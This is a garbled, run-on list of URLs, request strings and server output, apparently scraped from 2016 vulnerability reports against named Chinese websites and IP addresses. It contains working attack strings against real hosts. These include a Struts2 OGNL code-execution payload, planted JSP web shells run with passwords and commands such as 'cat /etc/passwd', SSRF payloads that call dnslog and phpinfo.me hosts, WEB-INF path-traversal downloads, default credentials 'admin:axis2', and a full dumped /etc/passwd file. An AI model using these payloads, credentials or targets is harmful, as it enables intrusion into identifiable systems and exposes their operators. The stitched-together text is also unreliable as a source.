zzkhrq:30001231,khzzh:13,lxdz:,p_fyqs:1,khzt:,sr1:,p_gybh:1,csrq1:,khxm:4,khbh:- p_sfbz:0,jgid:,p_fyhs:10,zjlx:- p_czzd:127.0.0.1,sr2:,zjhm:,qskhrq:19491001,lxhm:,bz:,p_kzcs:,p_pxzd:,p_gnbh:13990006,sfkzqx:1,khjb2:,yzbm p_gymm:AEIFCAJEOIACHCGCCGLI http://www.ms-zj.com.cn/login.shtml http://notify.oupeng.com/notify http://xxx.dnslog.info/oupeng http://210.38.58.25:8080/opac/search_rss.php?location=ALL&title=ccc&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&sort=CATA_DATE&onlylendable=yes&with_ebook=&with_ebook= http://210.38.57.36:8081/infolist.aspx?itc=4bafb777-faa5-42a0-b05a-8e36e8737bfd http://210.38.57.36:8083/infolist.aspx?itc=462828B3-9CBD-4F02-A336-45B7A31A6581 http://210.38.57.36:8082/infolist.aspx?itc=401aeb70-6a42-44db-8447-0ccc3918b527 http://210.38.57.36:8082/info.aspx?ID=103 http://210.38.57.36:8083/info.aspx?id=135 http://210.38.57.36:8084/infolist.aspx?itc=210808cd-6be8-4108-b54c-cf095c16c011 http://210.38.57.36:8084/info.aspx?ID=305 http://123.206.77.131:8080/ http://180.167.72.216:89 http://im.guodu.com:9090中, 
http://111.205.160.129:9090/report www.guazi.com www.i21st.cn http://211.151.59.27:80/axis2/axis2-admin/login admin:axis2 http://**.**.**/ http://120.132.85.22/catch/channel http://shleju.w114.mc-test.com:80/ http://staff.guazi.com/ http://wuxian.guazi.com/web/#/app http://jr.bc.guazi.com/ http://223.203.210.213/ http://touch.qunar.com/ http://www.state-dr.com/productdisplay.php?sortid=112 index.php/welcome/index http://202.98.213.133/ http://**.**.**.**/sqh/business/list.html?kindid=328b52a5eb624de68580b3a6119ec4ac&name=3&nowpage=2 http://118.26.57.34/letv_bao/system/login https://github.com/suntinghui/BaiFuTongApp/blob/ea45f886332348aa871cd18204029f086d338e22/BaiFuTongApp/Source/Controller/SuggestionBackViewController.m http://renwen.njfu.edu.cn/admin/Admin_Login.asp http://**.**.**.**/bugs/wooyun-2016-0220585 http://**.**.**.**/sqh/business/newsinfo.html?nid=945 http://**.**.**.**/sqh/helpinfo.html?nid=f9baf9f15e01 http://**.**.**/_ http://*.*.*.*/job/1/configure git:https://github.com/chsfuture/yotta_web/blob/7e4a27dd922da31eb8301391276eaea650ef5182/conf/heka/template_hekad_daemon.toml http://person.sac.net.cn/pages/login/downloadFile.action?inputPath=WEB-INF/web.xml&fileName=1.docl http://person.sac.net.cn/pages/login/downloadFile.action?inputPath=WEB-INF%2Fclasses%2FapplicationContext.xml&fileName=1.docl http://www.thfund.com.cn/ http://www.thfund.com.cn//thfund/fundlist/search/api/?word=e http://person.sac.net.cn/pages/sacinfo/downloadFile.action?inputPath=WEB-INF%2Fweb.xml&fileName=studentFlow.pdf http://person.sac.net.cn/pages/registration/downloadFile.action?inputPath=WEB-INF%2Fweb.xml&fileName=studentFlow.pdf http://www13.chinacache.com:9000/jmx-console/ http://g.1905.com/index.php?m=Home&c=newsdetail&a=index&id=1514 http://yule.kuwo.cn/ http://kappa.kuwo.cn/ http://huodong.kuwo.cn/ http://album.kuwo.cn/ http://playlist.kuwo.cn/ http://play.kuwo.cn/ http://changba.kuwo.cn/ http://www.kuwo.cn/ http://tupian.kuwo.cn/ http://hbtv.kuwo.cn/ 
http://gxtv.kuwo.cn/ http://yinyue.kuwo.cn/ http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1 http://mcenter6-xiaop.ppmoney.com/statistic.php?m=Count&a=collection&type=chatjs&siteid=kf_9150&kfid=kf_9150_ISME9754_T2D_6022&guestid=kf_9150_ISME9754_guestE2194B7F-0543-7B&action=11&htmlsid=1466134524852011&chatsession=&settingid=kf_9150_1452647794846&ts=1466134525371 http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**/webservice/MuiltiExam.asmx?op=DeleteSendedKscj http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl http://**.**.**.**/DeleteSendedKscj soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**/Login.aspx http://218.17.55.189/page/element/news/more.jsp?ebaseid=news&eid=1123 http://www.wooyun.org/actdo.php?action=sms&do=giftremind&corpid=1&whitehatid=11111 http://www.wooyun.org/actdo.php?action=sms&do=contactwhitehat&whitehatid=11111 http://www.wooyun.org/actdo.php?action=sms&do=giftremind&corpid=1&whitehatid=11111 http://istock.jrj.com.cn/istock.tar.gz http://istock.jrj.com.cn/%3f.jsp http://**.**.**.**/upload.rar http://yfpt.csc.com.cn:8080/km/login.dhtml http://yfpt.csc.com.cn:8080 https://github.com/jiagh/inkestreaming/blob/f47045ce6214d5adb963f380e9f55fb37be9f6c7/inke-streaming/.idea/%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BF%A1%E6%81%AF.txt http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012 coding:utf-8 http://stats.sc.weibo.com/stats/os?stats_id=1002&platform_id= http://live.huatu.com/Msym/index/id/49/fx/index http://180.153.223.220/seeyon/ http://180.153.223.220/seeyon/services/authorityService?wsdl http://180.153.223.220/seeyon/services/personService?wsdl http://www.hx168.com.cn/hxzq/hindex.html 
http://hctzxy.hx168.com.cn/customize/nwc_755_newvlms_default/login/login.aspx http://newv.com.cn/GetUserExamView Host:hctzxy.hx168.com.cn http://www.bbktel.com.cn/productDetail.php?Class_ID=1&Pro_ID=69 http://www.bbktel.com.cn/bbs/ https://account.daocloud.io/signin http://app.bilibili.com/bangumi/getVersion.ver?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23a%3D%23parameters.q%5B0%5D%2C%23c%3D%23parameters.q%5B1%5D%2C%23req%3D%23context.get%28%23a%29%2C%23b%3D%23req.getRealPath%28%23c%29%2C%23hh%3D%23context.get%28%23parameters.r%5B0%5D%29%2C%23hh.getWriter%28%29.println%28%23parameters.g%5B1%5D%2b%23parameters.u%5B0%5D%2b%23b%2b%23parameters.u%5B0%5D%2b%23parameters.g%5B0%5D%29%2C%23hh.getWriter%28%29.flush%28%29%2C%23hh.getWriter%28%29.close%28%29%2C1?%23g%3A%23request.toString&q=com.opensymphony.xwork2.dispatcher.HttpServletRequest&r=com.opensymphony.xwork2.dispatcher.HttpServletResponse&q=/&g=%3C-&g=-%3E&u=%7C http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=ifconfig http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.16 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.21 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=cat http://182.92.241.143 http://**.**.**/ http://**.**.**/bea_wls_internal/ceshi.jsp jdbc:oracle:thin:@10.5.1.167:1521:hhuat http://e.dangdang.com/media/api.go?category=TS http://e.dangdang.com/media/api.go?category=TS http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareget_urlinfo?fupdate=1&url=http://127.0.0.1:8081/&g_tk=2109654981 http://60.212.43.251:8341/SKServer/ http://218.241.156.10:7001/jtbx http://218.241.156.10:7001/jtbx/config/uploadlicencefile.jsp http://218.241.156.10:7001/jtbx/ https://sslvpn.guazi.com/por/service.csp?rnd=jgbglohgffgobmdc http://**.**.**.**/tc/photo_details.asp?id=32 http://**.**.**.**/tc/contents.asp?id=12 post:http://**.**.**.**/tc/search.asp data:keywords:123 http://183.136.160.234:8161/ http://183.136.160.234:8161/admin/test/sex.jsp 
http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:134:134:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:497:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin tss:x:59:59:Account daemon:/dev/null:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ricci:x:140:140:ricci user:/var/lib/ricci:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin 
dhcpd:x:177:177:DHCP server:/:/sbin/nologin memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pulse:x:495:492:PulseAudio Daemon:/var/run/pulse:/sbin/nologin stap-server:x:155:155:Systemtap Server:/var/lib/stap-server:/sbin/nologin xguest:x:500:500:Guest:/home/xguest:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin luci:x:141:141:luci application:/var/lib/luci:/sbin/nologin ident:x:98:98::/:/sbin/nologin uuidd:x:494:488:UUID daemon:/var/lib/libuuid:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin yuanming:x:501:501::/home/yuanming:/bin/bash haibo:x:502:502::/home/haibo:/bin/bash gaozhi:x:503:503::/home/gaozhi:/bin/bash hanjian:x:504:504::/home/hanjian:/bin/bash liuxin:x:505:505::/home/liuxin:/bin/bash yiqian:x:506:506::/home/yiqian:/bin/bash yifeng:x:507:507::/home/yifeng:/bin/bash www:x:508:508::/home/www:/bin/bash couchbase:x:493:486:couchbase user:/opt/couchbase:/bin/sh nginx:x:492:485:Nginx server:/var/lib/nginx:/sbin/nologin td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin yongrong:x:509:509::/home/yongrong:/bin/bash baoku:x:510:10::/home/baoku:/bin/bash yuwenlong:x:511:511::/home/yuwenlong:/bin/bash jizheng:x:512:10::/home/jizheng:/bin/bash zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash http://wooyun.org/bugs/wooyun-2016-0224381 http://183.136.160.212:8161/ http://183.136.160.212:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts http://183.136.160.212:8161/admin/test/sex.jsp?pwd=023&cmd=arp%20-a http://wooyun.org/bugs/wooyun-2016-0222995 http://www.bbktel.com.cn/ 
www.bbktel.com.cn http://61.155.152.126:9999 https://github.com/yqbaa/mmm/blob/553aeb33860152b3f46f8ace53660617b03e8cd9/configs/smtpConfig.php http://lib.gzhmu.edu.cn/oldweb/pp.rar http://lib.gzhmu.edu.cn/gctj/index.asp http://v.6.cn/coop/mobile/index.php?padapi=coop-mobile-inroom.php&ruid=【主播uid】&playeruid=&encpass= https://mail.jiayuan.com http://**.**.**.**/datau/cmcc/ http://www.aoyou.com/ http://cyts.chinaopenschool.com/customize/nwc_user_newvexam/login/login.html Host:cyts.chinaopenschool.com http://yun.1905.com/index.php?m=Home&c=User&a=findPassword http://mail.hsbank.com.cn https://github.com/aoliang/demo/blob/4fe5c8b2f38ce9b3e75974bd72593690a117ffd5/src/main/java/com/github/mail/SendMail.java http://jpkc.wzu.edu.cn/xhyxt/col_tsjx/detail.aspx?tid=25&ID=751 http://yun.1905.com http://yun.1905.com/index.php?m=Home&c=User&a=findPassword http://yun.1905.com/admin.php时发现Duang的一下跳到了后台! http://yun.1905.com/admin.php?s=/Public/login http://www.kibey.com http://**.**.**/ http://**.**.**/manage http://123.56.246.2:10001/login.action http://123.56.246.2:8083 http://139.196.105.162:8081/ http://180.167.72.216:88/login/Login.jsp http://180.167.72.216:88//services/MobileService?wsdl http://123.59.138.141/ http://drops.wooyun.org/papers/15892 http://prepare.chinaexpressair.com/admin/login.aspx https://service.hxzq.cn/servlet/sso/Manage?function=ForwardConfirmMobileSetp1 http://caipiao.dangdang.com/api/get.php?cache_lifetime=30&call_time=1467988328&method=header&source=a8d620b2bb6cce75bd6d7db53c1486e2&url=file:///etc/passwd http://caipiao.dangdang.com/api/get.php?cache_lifetime=30&call_time=1467988328&method=header&source=a8d620b2bb6cce75bd6d7db53c1486e2&url=http://192.168.1.203 http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img 
http://club.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img http://bbs.youkutv.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img http://bbs.share.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img http://bbs.wan.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm encap:Ethernet B1:1C:4C:A9:F2 addr:192.168.1.203 Bcast:192.168.1.255 Mask:255.255.255.0 fe4c:a9f2/64 Scope:Link MTU:1500 packets:3425084210 frame:4604 packets:2920393573 txqueuelen:1000 http://learn.open.com.cn/登入 http://oemsresource.open.com.cn/Attachment/ExportTemp/OEMS/PictureTemp/20160711/ http://shop.cib.com.cn//?m=product&s=detail&id=457 http://s.51.com/ http://i.lianle.com/Account/register http://wooyun.org/bugs/wooyun-2010-0215779 http://war.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img http://kd.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren4.22e642.dnslog.info/?data=helo.jpg[/img http://fans.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img http://gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img http://www.msol.cc:8080/user_goRegisterPage.action http://www.jin.12306.cn/Dzsw/Shky/hwky.wai/trackorder.action http://zhnx.ynrcc.com/index 
http://112.112.13.35:8080/admin/login http://st.so.com http://st.so.com/stu https://github.com/lz958942/tuanche-old/blob/d19773659fdd3796be14cf7849a7a99bf69bed9d/adminweb/cms/tags/testCms/src/main/resources/application.properties http://210.21.61.132:8001/wisdomServer/wisdomClient/main.html